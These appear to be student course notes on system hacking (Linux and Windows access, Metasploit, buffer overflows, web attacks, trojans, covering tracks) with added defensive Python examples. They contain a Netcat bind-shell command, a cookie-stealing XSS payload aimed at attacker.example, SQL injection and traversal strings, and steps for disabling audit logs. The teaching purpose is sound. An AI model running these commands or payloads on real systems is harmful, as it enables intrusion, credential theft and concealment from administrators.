Eh - Unit 4

The document outlines various aspects of system hacking, including methods used by hackers, risks to users, and specific techniques for hacking different operating systems like Linux and Windows. It also discusses tools like Metasploit and Kali Linux, as well as types of attacks such as buffer overflows, privilege escalation, and application vulnerabilities. Preventive measures against these attacks are highlighted throughout the document.

Uploaded by Atharva Pathak

Gaining Access, Maintaining Access & Covering Tracks

System Hacking

🔹 What is System Hacking?

● System hacking refers to compromising software-based computing systems such as desktops, laptops and servers.
● It means compromising the operating system and the software running on it to gain access to the target system.
● The goal is to steal or misuse sensitive information without the user's consent.

🔹 How Hackers Do It:

● Hackers exploit weaknesses in computer systems or networks to gain unauthorized access.
● They understand how computer systems and software work internally.
● A hacker usually has good knowledge of:
  ○ Systems
  ○ Networking
  ○ Other areas of computer science

🔹 Who is at Risk?

● Anyone using a computer connected to the internet is a potential target.
● Online attackers can use various techniques to hijack systems.

🔹 Methods Used by Hackers:

1. Viruses
2. Trojans
3. Other malware (spyware, ransomware, rootkits)
4. Worms
5. Phishing
6. Email spamming
7. Social engineering
8. Exploiting OS vulnerabilities
9. Exploiting vulnerable network services exposed on open ports

🔹 What Happens After a System Is Hijacked?

1. Delete the victim's files and data
2. Steal files and folders
3. Hijack usernames and passwords
4. Steal money or credit card information during online transactions
5. Sell personal information to third parties for illegal use
6. Generate fake traffic (denial of service) to take down the victim's website
7. Access servers and manipulate files and programs

System Hacking Platform
🐧 Linux System Hacking

🔹 What is Linux?

● Linux is an Operating System (OS) based on Unix.
● It was created by Linus Torvalds.
● Developed under the open-source software model.

🔹 Why Hackers Target Linux?

● To hack a Linux system, you must understand its file system layout and permission model: where /etc/passwd and /etc/shadow live, which binaries are SUID, and where service configuration is kept.
● Linux is one of the most secure OSes, but nothing is 100% secure; most compromises come from misconfiguration, weak credentials and unpatched services rather than from the kernel itself.

🔹 Common Techniques to Hack Linux:

1. Using the shadow file (/etc/shadow, readable only by root) to extract password hashes and crack them offline.
2. Bypassing the user password prompt during login or boot, for example by editing the boot entry to start a root shell when the bootloader is not password-protected and the disk is not encrypted.
3. Finding bugs or misconfigurations in the distribution's software and exploiting them.
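The shadow-file technique above starts with reading the file, and what an attacker (or an auditor) does next is triage it: which accounts have no password at all, which are locked, and which use a weak hash scheme that cracks quickly offline. The following audit script is an added example written for this page, not code from the original notes; the shadow lines are constructed and the hash bodies are filler, not real hashes.

```python
# Added example (not from the original notes): triage /etc/shadow entries.
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample: format is name:hash:lastchange:min:max:warn:inactive:expire:reserved.
# The hash bodies are filler characters, not real crypt output.
SHADOW_SAMPLE = """\
root:$6$Z1x9Qm2p$abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmn:19700:0:99999:7:::
alice:$y$j9T$saltsaltsaltsalt$abcdefghijklmnopqrstuvwxyz0123456789abcdefghi:19700:0:99999:7:::
legacy:$1$abcdefgh$0123456789abcdefghijkl:19000:0:99999:7:::
backup::19700:0:99999:7:::
svc:!:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
"""

# crypt(3) scheme prefixes and how an attacker with the file would rate them.
HASH_SCHEMES = {
    "$1$": ("md5crypt", "weak: fast hash, cracks quickly offline"),
    "$2b$": ("bcrypt", "ok"),
    "$2y$": ("bcrypt", "ok"),
    "$5$": ("sha256crypt", "ok"),
    "$6$": ("sha512crypt", "ok"),
    "$y$": ("yescrypt", "ok"),
}


@dataclass
class Finding:
    user: str
    scheme: str
    risk: str


def classify(hash_field: str) -> Tuple[str, str]:
    """Map the second shadow field to (scheme, risk note)."""
    if hash_field == "":
        return "none", "critical: empty password field, login needs no password"
    if hash_field.startswith(("!", "*")):
        return "locked", "ok: password login disabled"
    for prefix, (name, risk) in HASH_SCHEMES.items():
        if hash_field.startswith(prefix):
            return name, risk
    if re.fullmatch(r"[./0-9A-Za-z]{13}", hash_field):
        return "descrypt", "weak: traditional DES crypt, password truncated to 8 chars"
    return "unknown", "review manually"


def audit_shadow(text: str) -> List[Finding]:
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        scheme, risk = classify(fields[1])
        findings.append(Finding(fields[0], scheme, risk))
    return findings


def risky_accounts(text: str) -> List[str]:
    """Accounts an attacker holding this file would go after first."""
    return [f.user for f in audit_shadow(text) if not f.risk.startswith("ok")]


if __name__ == "__main__":
    for f in audit_shadow(SHADOW_SAMPLE):
        print(f"{f.user:8} {f.scheme:12} {f.risk}")
```

Reading the file in the first place needs root, which is why this technique is usually paired with privilege escalation; on the defensive side, the same triage run from a configuration-management job catches the empty-password and md5crypt/DES leftovers before anyone else does.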


🪟 Windows System Hacking

🔹 Login Security:

● The Windows login password helps to prevent unauthorized access.
● It is good practice to set a strong password (at least 8 characters; a longer passphrase is better) to secure files and folders.

🔹 Hacking Techniques Used:

● There are many cracks and tricks to break Windows passwords.
● But the most effective method (from a hacker's point of view) is:
  ○ Use social engineering, or simply wait until the user leaves the system unlocked, to get access.
  ○ Modify the existing password and set a new one.
  ○ The victim remains unaware of the change.
● Caveat: physical access to an unlocked session defeats the login password entirely, which is why screen-lock timeouts and full-disk encryption matter as much as password strength.

System Hacking Tools

What is Metasploit?

● Metasploit is one of the most powerful tools used in ethical hacking and penetration testing.
● It is available in two versions:
  ○ Commercial version (Metasploit Pro, paid)
  ○ Community version (the open-source Metasploit Framework, free)

🔹 What is Kali Linux?

● Kali Linux is a popular Linux distribution used by ethical hackers.
● It comes pre-installed with the Metasploit Framework (community edition) and many other hacking tools.

🔹 Installing Metasploit Separately:

● Can be installed on Windows, Linux, or Mac OS X.
● Hardware Requirements (minimum):
  1. 1.2 GHz processor
  2. 1 GB RAM
  3. 1 GB free disk space

🔹 How to Open Metasploit in Kali Linux:

● Go to: Applications → Exploitation Tools → Metasploit, or run msfconsole from a terminal.
● After opening, a banner appears showing the version info (shown as red underlined text in the notes).

🎯 Using Metasploit – Step-by-Step Example

🔹 Scenario:

● The target Linux machine is found to be running a vulnerable FTP service (port 21).
● You can use Metasploit to exploit this vulnerability.

🔹 Commands and Steps:

1. Find the correct exploit module and select it:

       msf > search ftp
       msf > use [exploit path]

2. View the required settings:

       msf > show options

3. Set the target details (RHOSTS on current versions, RHOST on older ones):

       msf > set RHOSTS 192.168.1.101
       msf > set RPORT 21

4. Run the exploit:

       msf > run

5. If successful, you will get an active session to interact with the target system.

Buffer Overflows

🔹 What is a Buffer Overflow?

● A Buffer Overflow is an attack that targets weaknesses in application code, typically C/C++ programs that copy input into a fixed-size buffer without checking its length.
● It happens when more data is written to a buffer (variable) than it was allocated to hold.

🔹 How it works:

1. Overflow data is sent to a field beyond its storage capacity.
2. This causes the application to crash or behave unexpectedly.
3. The overflowed data overwrites adjacent memory: neighbouring variables, and on the stack the saved return address that decides where execution continues.
4. The app might:
  ○ Execute attacker-supplied machine code (shellcode) included in the overflow data.
  ○ Or be redirected into opening a command shell, allowing the attacker to run other commands.

🔹 Why it's dangerous?

● The shell gained through a buffer overflow is a gateway for hackers to:
  ○ Run malicious scripts
  ○ Launch other apps
  ○ Gain deeper access to the system
● Modern mitigations (stack canaries, non-executable stacks/DEP, ASLR) make exploitation harder but not impossible; the root fix is bounds-checked copying and memory-safe languages.
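The mechanism in step 3, the overflow spilling into whatever sits next in memory, is easier to believe when you can watch it happen. The example below is added for this page (it is not from the original notes) and uses Python's ctypes to lay out a C-style struct with an 8-byte buffer followed by an integer flag; the unchecked copy plays the role of strcpy(). The struct layout, field names and payload are this example's own assumptions.

```python
# Added example (not from the original notes): an unchecked copy overwriting
# the field that follows a fixed-size buffer, and the bounds check that stops it.
import ctypes
import struct

NAME_SIZE = 8


class Request(ctypes.Structure):
    # Memory layout: an 8-byte name buffer immediately followed by a 4-byte
    # flag.  ctypes places the fields back to back, exactly like a C struct.
    _fields_ = [("name", ctypes.c_char * NAME_SIZE), ("is_admin", ctypes.c_int)]


def copy_unchecked(req: Request, data: bytes) -> None:
    # Mimics strcpy()/memcpy() with no length check: every byte of `data` is
    # written starting at the buffer, so bytes 9.. land in `is_admin`.
    ctypes.memmove(ctypes.addressof(req), data, len(data))


def copy_checked(req: Request, data: bytes) -> None:
    # Hardened version: refuse anything that does not fit the buffer.
    if len(data) > NAME_SIZE:
        raise ValueError("input exceeds buffer size")
    ctypes.memmove(ctypes.addressof(req), data, len(data))


def handle(data: bytes, checked: bool) -> bool:
    """Copy `data` into a fresh Request and return the is_admin flag."""
    req = Request()                      # both fields start zeroed
    (copy_checked if checked else copy_unchecked)(req, data)
    return bool(req.is_admin)


def hardened_rejects(data: bytes) -> bool:
    try:
        handle(data, checked=True)
    except ValueError:
        return True
    return False


# Payload: 8 filler bytes fill `name`, the next 4 overwrite `is_admin` with 1.
# It is exactly sizeof(Request) bytes long so nothing beyond the struct is
# touched; a real overflow keeps going and corrupts whatever follows.
OVERFLOW = b"A" * NAME_SIZE + struct.pack("i", 1)
assert len(OVERFLOW) == ctypes.sizeof(Request)

if __name__ == "__main__":
    print("normal input -> is_admin =", handle(b"bob", checked=False))
    print("overflow     -> is_admin =", handle(OVERFLOW, checked=False))
    print("hardened copy rejects overflow:", hardened_rejects(OVERFLOW))
```

In a real stack overflow the interesting neighbour is not a flag but the saved return address, and the bytes that land on it point execution at the attacker's shellcode; the copy-without-a-length-check is the same bug either way.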

🔐 Privilege Escalation

🔹 What is Privilege Escalation?

● It is the third step in the hacking cycle as presented here, after a foothold has been gained.
● It refers to gaining higher permissions than initially granted.
● Example: Turning a normal user account into an Administrator account.

🔹 Why is it needed?

● Administrator accounts can:
  ○ Install/remove programs
  ○ Access sensitive files
  ○ Control user permissions
● If the hacker can't get direct Admin access, they'll try to escalate privileges from a lower-level account.

🔹 How it's done:

1. Gain access to a basic user account.
2. Use tools, misconfigurations (weak service or file permissions, credentials left in files) or OS vulnerabilities to increase privileges.
3. Once admin access is gained, hackers can run powerful programs or exploit further.

🔹 Tools for Privilege Escalation (historical Windows NT examples; both flaws were patched long ago):

● GetAdmin.exe:
  ○ Adds a user to the local Administrators group.
  ○ Uses NT kernel routines.
  ○ Needs console access to the server to run.
  ○ Works on Windows NT 4.0 SP3 only.
● Hk.exe:
  ○ Exploits a Local Procedure Call (LPC) flaw in Windows NT.
  ○ Allows non-admin users to become admins.

Application Hacking

1. SMTP / Email-based Attacks

SMTP (Simple Mail Transfer Protocol) is used to send email. Because SMTP itself does not authenticate the sender, hackers abuse email systems to:

● Spoof Email Addresses: send messages that appear to come from trusted sources.
● Phishing: trick users into clicking malicious links or sharing sensitive information.
● Spam: send bulk email to spread malware or scams.
● Open Relay Abuse: use misconfigured SMTP servers that relay mail for anyone to send spam anonymously.
● Preventive Measures:
  ○ Use email filtering and anti-virus tools.
  ○ Publish SPF, DKIM and DMARC records so receiving servers can authenticate the sending host and the message, and reject or quarantine failures according to the DMARC policy.
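The SPF part of that last measure is a check a receiving server performs on every message: look up the sending domain's SPF record and test the connecting IP against it. The evaluator below is an added example for this page, not code from the original notes. It handles the ip4, ip6 and all mechanisms with their qualifiers against constructed records (the domains and addresses are illustrative), refuses to guess mechanisms that would need DNS, and shows how the SPF result feeds the DMARC disposition.

```python
# Added example (not from the original notes): SPF evaluation and DMARC
# disposition for a single message, against constructed DNS records.
import ipaddress

# Constructed TXT records; a real receiver fetches these with a DNS lookup.
SPF_RECORDS = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 -all",
    "relay.example": "v=spf1 ip4:198.51.100.7 ~all",
    "nospf.example": None,
}

RESULT_FOR_QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_check(domain: str, sender_ip: str) -> str:
    """Evaluate the ip4/ip6/all mechanisms of the domain's SPF record.

    Returns pass, fail, softfail, neutral or none.  Mechanisms that need
    further DNS (include, a, mx, exists) raise instead of being guessed,
    because a guessed verdict would silently let spoofed mail through.
    """
    record = SPF_RECORDS.get(domain)
    if not record or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"                       # an unqualified mechanism means pass
        if term[0] in RESULT_FOR_QUALIFIER:
            qualifier, term = term[0], term[1:]
        mechanism, _, arg = term.partition(":")
        if mechanism == "all":
            return RESULT_FOR_QUALIFIER[qualifier]
        if mechanism in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            if ip.version == net.version and ip in net:
                return RESULT_FOR_QUALIFIER[qualifier]
        elif mechanism in ("include", "a", "mx", "exists"):
            raise NotImplementedError(f"{mechanism} needs DNS resolution")
    return "neutral"                          # no mechanism matched, no 'all'


def dmarc_disposition(spf_result: str, spf_aligned: bool,
                      dkim_aligned_pass: bool, policy: str) -> str:
    """DMARC passes if SPF passed with an aligned domain or an aligned DKIM
    signature verified; otherwise the domain's p= policy decides."""
    if (spf_result == "pass" and spf_aligned) or dkim_aligned_pass:
        return "deliver"
    return {"none": "deliver", "quarantine": "quarantine", "reject": "reject"}[policy]


if __name__ == "__main__":
    for domain, ip in [("example.com", "192.0.2.55"), ("example.com", "203.0.113.9"),
                       ("relay.example", "203.0.113.9"), ("nospf.example", "192.0.2.1")]:
        print(f"{domain:15} {ip:15} -> {spf_check(domain, ip)}")
```

The softfail on relay.example is the common real-world gap: "~all" asks receivers to accept but mark the mail, so spoofed messages still land in the inbox unless DMARC is published with p=quarantine or p=reject.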

2. VOIP Vulnerabilities

VOIP (Voice over IP) carries voice calls over the internet, usually with SIP for signalling and RTP for the audio. It can be targeted in the following ways:

● Eavesdropping: intercepting unencrypted calls on the network path.
● Caller ID Spoofing: faking the caller identity to scam users.
● Denial of Service (DoS): overloading the VOIP server to disrupt service.
● Registration Hijacking: stealing SIP credentials to register as the victim and make or receive their calls.
● Preventive Measures:
  ○ Encrypt the media with SRTP and the signalling with SIP over TLS.
  ○ Implement strong authentication for SIP registration.
  ○ Keep VOIP software updated.

3. Directory Traversal

This attack allows hackers to read files and directories outside the web root folder.

● How it Works: by using ../ sequences in URLs (often URL-encoded as %2e%2e%2f to slip past naive filters) to move up in the directory structure.
  ○ Example: http://example.com/view?file=../../etc/passwd
● Consequences: access to sensitive files like password or configuration files.
● Preventive Measures:
  ○ Input validation and sanitization: decode the value, canonicalise the resulting path and confirm it still lies inside the web root.
  ○ Restrict the file access permissions of the web server process.
  ○ Use secure programming practices.
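The first preventive measure is the one most often implemented wrongly, so here is the bug beside its fix. This is an added example for this page, not code from the notes; the web root path and file names are assumptions. The vulnerable resolver joins the user value onto the root; the safe one decodes, canonicalises and checks containment.

```python
# Added example (not from the original notes): directory traversal, the
# naive path join beside a resolver that canonicalises and checks containment.
import os
from pathlib import Path
from urllib.parse import unquote


def vulnerable_resolve(web_root: str, user_file: str) -> str:
    # Joins the user value straight onto the root.  "../../etc/passwd" walks
    # out, and an absolute value like "/etc/passwd" makes join discard the root.
    return os.path.join(web_root, unquote(user_file))


def safe_resolve(web_root: str, user_file: str) -> Path:
    root = Path(web_root).resolve()
    # Decode first (attackers send %2e%2e%2f), then canonicalise: resolve()
    # collapses ".." and follows symlinks, so a link inside the root that
    # points outside it is caught as well.
    candidate = (root / unquote(user_file)).resolve()
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"path escapes web root: {user_file!r}")
    return candidate


def escapes_root(web_root: str, user_file: str) -> bool:
    """True if the hardened resolver rejects this request."""
    try:
        safe_resolve(web_root, user_file)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    root = "/var/www/html"   # assumed web root
    for f in ["docs/readme.txt", "../../etc/passwd",
              "%2e%2e%2f%2e%2e%2fetc%2fpasswd", "/etc/passwd"]:
        print(f"{f:32} naive -> {vulnerable_resolve(root, f):36} "
              f"rejected={escapes_root(root, f)}")
```

Note that the check is on the canonical path, not on the string: stripping "../" from the input is a losing game (".%2e/", "....//" and friends), whereas "is the resolved path under the resolved root" has no such variants.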

4. Input Manipulation

Input manipulation involves altering input data so that an application interprets it as code or as a trusted value rather than as plain data.

● Types:
  ○ Command Injection: injecting OS commands into a value the application passes to a shell.
  ○ HTML Injection: injecting malicious HTML into a page.
  ○ Cookie Manipulation: modifying cookie values (e.g. a role or user id) to escalate privileges.
● Preventive Measures:
  ○ Use input validation (allowlists of the exact shape a value may take).
  ○ Sanitize and encode user inputs for the context they are used in.
  ○ Avoid using user input directly in system commands; pass arguments as a list to the program instead of building a shell command line.
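Command injection and its two-layer fix, as an added example for this page (not from the original notes). The command uses echo instead of ping or nslookup so the demo is harmless and runs offline; the hostname pattern and marker string are this example's assumptions.

```python
# Added example (not from the original notes): OS command injection through
# shell=True, beside allowlist validation plus an argv list that no shell parses.
import re
import subprocess

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def announce_vulnerable(host: str) -> str:
    # The user value is spliced into a shell command line.  /bin/sh parses
    # ';', '|', '&&' and '$(...)', so "x; echo INJECTED" runs a second command.
    # (echo stands in for ping/nslookup so the demo stays harmless.)
    result = subprocess.run(f"echo resolving {host}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def announce_safe(host: str) -> str:
    # Layer 1: allowlist validation of the only shape a hostname may take.
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"invalid hostname: {host!r}")
    # Layer 2: argv list, no shell.  Even if validation were skipped, the
    # value reaches the program as one argument and is never parsed.
    result = subprocess.run(["echo", "resolving", host],
                            capture_output=True, text=True)
    return result.stdout


def second_command_ran(output: str) -> bool:
    """The marker appears on a line of its own only if the injected echo ran."""
    return "INJECTED" in output.splitlines()


def safe_rejects(host: str) -> bool:
    try:
        announce_safe(host)
    except ValueError:
        return True
    return False


PAYLOAD = "example.com; echo INJECTED"   # constructed attacker input

if __name__ == "__main__":
    print("vulnerable:", repr(announce_vulnerable(PAYLOAD)))
    print("safe rejects payload:", safe_rejects(PAYLOAD))
    print("safe:", repr(announce_safe("example.com")))
```

The two layers are independent on purpose: validation protects the program's logic from junk, the argv list protects it from the shell, and a reviewer should expect to see both.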

5. Brute Force Attacks

This involves trying many candidate usernames and passwords (all combinations, or more often a wordlist of likely ones) to gain access.

● Types:
  ○ Online Brute Force: direct login attempts against the live service, limited by network speed and server-side controls.
  ○ Offline Brute Force: cracking stolen password hashes, limited only by the attacker's hardware and the hash's work factor.
● Preventive Measures:
  ○ Use CAPTCHA.
  ○ Implement account lockout or rate limiting after failed attempts (lockout alone lets an attacker lock users out, so pair it with backoff and MFA).
  ○ Enforce strong password policies and store passwords with a slow, salted hash.
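Both types in one place, as an added example for this page (not from the original notes): an offline dictionary attack against a leaked PBKDF2 hash, and the online-side lockout that limits direct guessing. The leaked hash, wordlist, salt and lockout parameters are constructed for the example.

```python
# Added example (not from the original notes): offline hash cracking versus
# an online lockout guard, around a salted PBKDF2-SHA256 password store.
import hashlib
import hmac
import os
import time
from typing import List, Optional

ITERATIONS = 100_000   # work factor; raise it in production


def make_hash(password: str, salt: Optional[bytes] = None,
              iterations: int = ITERATIONS) -> str:
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify(password: str, stored: str) -> bool:
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def offline_crack(stored: str, wordlist: List[str]) -> Optional[str]:
    # Offline: the attacker holds the hash, so nothing rate-limits the guesses;
    # only the work factor and the password's entropy slow them down.
    for candidate in wordlist:
        if verify(candidate, stored):
            return candidate
    return None


class LoginGuard:
    """Online side: lock the account after `limit` failures inside `window` s."""

    def __init__(self, stored: str, limit: int = 5, window: float = 900.0):
        self.stored, self.limit, self.window = stored, limit, window
        self.failures: List[float] = []

    def attempt(self, password: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        self.failures = [t for t in self.failures if now - t < self.window]
        if len(self.failures) >= self.limit:
            return "locked"            # refused even if the password is right
        if verify(password, self.stored):
            self.failures.clear()
            return "ok"
        self.failures.append(now)
        return "denied"


# Constructed leak: a stolen hash (fixed salt so the demo is reproducible)
# and a small attacker wordlist.
LEAKED_HASH = make_hash("Summer2024", salt=bytes.fromhex("00112233445566778899aabbccddeeff"))
WORDLIST = ["123456", "password", "letmein", "qwerty", "Summer2024", "hunter2"]

if __name__ == "__main__":
    print("offline crack found:", offline_crack(LEAKED_HASH, WORDLIST))
    guard = LoginGuard(LEAKED_HASH, limit=3)
    print([guard.attempt(p) for p in ["a", "b", "c", "Summer2024"]])
```

The asymmetry is the lesson: the guard stops the online guesser after three tries, but it does nothing for the offline attacker, who is stopped only by the work factor and by the password not being in any wordlist.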

6. Unsecured Login Mechanisms

Login mechanisms that lack proper security measures can be exploited.

● Common Weaknesses:
  ○ Transmitting credentials in plain text, where anyone on the network path can capture them.
  ○ No session timeout, so a stolen or abandoned session stays valid indefinitely.
  ○ No multi-factor authentication, so a stolen password alone is enough.
● Preventive Measures:
  ○ Use HTTPS to encrypt communication.
  ○ Implement MFA.
  ○ Ensure secure session management (random session ids, expiry, rotation after login).

7. SQL Injection

SQL Injection is one of the most dangerous web application attacks.

● How it Works: malicious SQL fragments are inserted into an input field and concatenated into a query, so the input changes the query's logic instead of being treated as a value.
  ○ Example: ' OR '1'='1
● Consequences: unauthorized access to the database, data leakage, or data manipulation.
● Preventive Measures:
  ○ Use parameterized queries (prepared statements).
  ○ Validate and sanitize all inputs.
  ○ Limit database user privileges.
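The example payload, run against a real query engine, with the concatenated query beside the parameterized one. This is an added example for this page, not code from the notes; the users table and its rows are constructed, and passwords are stored in plain text only to keep the demo focused on the injection (a real table stores salted hashes, as in the brute-force section above).

```python
# Added example (not from the original notes): the classic tautology payload
# against string-built SQL versus a parameterised query, on in-memory SQLite.
import sqlite3
from typing import List


def setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    # Constructed rows.  Plaintext passwords only to keep the demo focused on
    # the injection; a real table stores salted hashes.
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "S3cret!", "admin"), ("alice", "wonderland", "user")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    # String concatenation: the input becomes part of the SQL grammar.  With
    # password = ' OR '1'='1 the WHERE clause reads
    #   username='admin' AND password='' OR '1'='1'
    # and the OR makes it true for every row.
    sql = (f"SELECT username FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    # Parameterised query: the driver sends the values separately from the
    # statement, so a quote in the input is just a character in a string.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    conn = setup()
    print("vulnerable:", login_vulnerable(conn, "admin", PAYLOAD))
    print("safe:      ", login_safe(conn, "admin", PAYLOAD))
```

Returning every row is the mild outcome; the same concatenation point accepts UNION SELECT to read other tables, and on engines that allow stacked statements it accepts a trailing DROP or UPDATE.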

8. Cross-Site Scripting (XSS)

XSS involves injecting malicious scripts into webpages viewed by other users, so the script runs in the victim's browser with the victim's session.

● Types:
  ○ Stored XSS: the script is saved on the server (a comment, a profile field) and served to every user who views it.
  ○ Reflected XSS: the script is embedded in a URL and echoed straight back in the response, executing when the victim opens the link.
● Consequences: session hijacking (cookie theft), redirection to malicious sites, actions performed as the victim.
● Preventive Measures:
  ○ Encode output for the context it is placed in (HTML body, attribute, JavaScript).
  ○ Use Content Security Policy (CSP) to limit where scripts may load from.
  ○ Avoid using user input directly in HTML/JS.
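What "encode for the context" means in practice, as an added example for this page (not from the original notes): the same stored comment rendered raw and escaped, a value handed to JavaScript with the "</script>" breakout closed off, and the CSP header that limits the damage if an encoding step is missed. The payloads, page structure and policy string are constructed for the example.

```python
# Added example (not from the original notes): stored XSS, context-aware
# output encoding, and the CSP header that backs it up.
import html
import json

CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'")


def render_comment_vulnerable(comment: str) -> str:
    # Stored XSS: whatever was saved is echoed into the page as markup.
    return f'<li class="comment">{comment}</li>'


def render_comment_safe(comment: str) -> str:
    # Encode for the HTML text context: < > & " ' become entities.
    return f'<li class="comment">{html.escape(comment, quote=True)}</li>'


def render_config_script(value) -> str:
    # Data handed to JavaScript needs JSON encoding for the script context,
    # plus '<' escaped so a value cannot contain '</script>' and close the tag.
    payload = json.dumps(value).replace("<", "\\u003c")
    return f"<script>const cfg = {payload};</script>"


def page(comments, config) -> str:
    body = "".join(render_comment_safe(c) for c in comments)
    return (f"<html><body><ul>{body}</ul>"
            f"{render_config_script(config)}</body></html>")


def executes_script(fragment: str) -> bool:
    """Crude check: does the fragment contain a live <script> start tag?"""
    return "<script" in fragment.lower()


# Constructed payloads of the two kinds the text describes.
STORED_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
SCRIPT_BREAKOUT = "</script><script>alert(1)</script>"

if __name__ == "__main__":
    print(render_comment_vulnerable(STORED_PAYLOAD))
    print(render_comment_safe(STORED_PAYLOAD))
    print(render_config_script({"name": SCRIPT_BREAKOUT}))
    print(f"{CSP_HEADER[0]}: {CSP_HEADER[1]}")
```

With that CSP, an inline script that does slip through is refused by the browser because inline scripts are not 'self'; the encoding is the fix, the header is the safety net.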


9. Mobile Applications Security

Mobile apps are frequent targets because they run on devices the attacker can fully control and are often built with insecure development practices.

● Common Issues:
  ○ Insecure storage of sensitive data (tokens, credentials) on the device.
  ○ Weak or home-grown encryption.
  ○ Poor authentication and authorization, often trusting checks done only on the client.
  ○ Reverse engineering of APKs to recover secrets and API endpoints.
● Preventive Measures:
  ○ Secure coding practices; keep authorization decisions on the server.
  ○ Use strong, standard encryption (AES for data, RSA or elliptic-curve keys for exchange) from a vetted library.
  ○ Regular security testing and updates.

Malware Analysis

● Definition: Malware analysis is the process of understanding how malware works and what impact it might have on a system.
● Purpose: to identify the malware's functionality and predict the potential outcome of an infection. Static analysis inspects the file without running it; dynamic analysis runs it in an isolated sandbox and observes its behaviour.
● Types of Malware:
  ○ Worms
  ○ Viruses
  ○ Spyware
  ○ Trojan horses
● Key Point: malware collects data from an infected device without the user's knowledge or consent.

Netcat Trojan

● What is Netcat?
  ○ Netcat is a general-purpose command-line networking utility that reads and writes raw TCP or UDP connections. Used with its -e option it binds a shell to an open port on the target, which is why anti-virus products classify that use as a Trojan/backdoor.
● Function:
  ○ Allows hackers to connect (with netcat itself or a Telnet client) to the open port.
  ○ Provides shell access to the target system.
● Availability:
  ○ Available for all Windows OS versions.
  ○ Originally developed for Unix and included in many Linux distributions like BackTrack (the predecessor of Kali).
● How It Works:
  ○ Needs to run on both the client (attacker) and the server (victim).
  ○ The server uses the -l (listen) option, -L on the Windows build, to create a listener port, and -e to hand each connection to a program.

Example Command (on server):

    nc -L -p 123 -t -e cmd.exe

Client-side Command:

    nc <IP address of the server> <listening port>

Caveat for defenders: a listening port that hands out a shell shows up in netstat/ss output and in egress/ingress firewall logs, and the Windows build's -L/-e combination is exactly what endpoint protection signatures look for.

Wrappers

● Definition: Wrappers are software packages used to deliver a Trojan by binding it to a legitimate file.
● Functionality:
  1. Combine authorized software and the Trojan into one executable.
  2. Both get installed when the user runs the program.
● Common Bait:
  1. Games or animated installers are often used.
  2. These distract users while the Trojan installs silently in the background.
● Examples:
  1. Graffiti: an animated game that entertains the user while the Trojan installs.
  2. Silk Rope 2000: wraps the Back Orifice server with another app.
  3. ELITeWrap:
     ■ Advanced .exe wrapper.
     ■ Can create setup programs that extract files, run programs or batch files, display help, or copy files to target systems.

Reverse Engineering

Definition:
● The process of disassembling something to understand how it works, either to duplicate or enhance it.

Software Reverse Engineering:

● Purpose:
  ○ Retrieve lost source code.
  ○ Understand program behaviour.
  ○ Improve performance.
  ○ Fix bugs.
  ○ Identify viruses or malware.
  ○ Adapt software for a different processor.
● How:
  ○ A disassembler converts machine code back into assembly language; a decompiler goes a step further and reconstructs an approximation of the original source.
● Legal Concerns:
  ○ May violate copyright if done without authorization.
  ○ Some software licenses prohibit reverse engineering.
● Tools Used:
  ○ Hexadecimal Dumper: displays binary data in hexadecimal.
  ○ Helps identify parts of the file (headers, code, data) and understand processor instructions.

Hardware Reverse Engineering:

● Definition:
  ○ Taking apart a hardware device to see how it works.
● Example:
  ○ A processor manufacturer buys a competitor's processor, studies it, and creates a similar one (illegal in many countries).
● Challenges:
  ○ Requires high expertise.
  ○ Expensive process.
● Part Reverse Engineering:
  ○ Used when no blueprint is available.
  ○ The part is measured using a CMM (Coordinate Measuring Machine).
  ○ Generates a 3D wireframe model of the part.

Forward Engineering:

● The opposite of reverse engineering: building something from scratch using original specifications.

Phases: Covering Your Tracks

✅ Definition

● Once a hacker gains Administrator access, they attempt to cover their tracks to:
  1. Avoid detection of past or current activity.
  2. Prevent system admins or authorities from tracing their identity or location.
● Typical actions include:
  1. Erasing error messages
  2. Clearing security events
● Two common methods:
  1. Disabling auditing
  2. Clearing or altering event logs

🛑 Disabling Auditing

● Windows uses auditing to log events like:
  ○ Logins
  ○ Application usage
  ○ System activity
● These are stored in the Windows event logs and viewed with Event Viewer.
● Hackers disable auditing to stop new logs from being generated.
● Steps:
  ○ Check the current audit policy (logging level).
  ○ Disable auditing if logging would reveal traces of the hacker's activity.
● Why?
  ○ Prevents future actions from being recorded.
  ○ Avoids suspicion during forensic analysis.
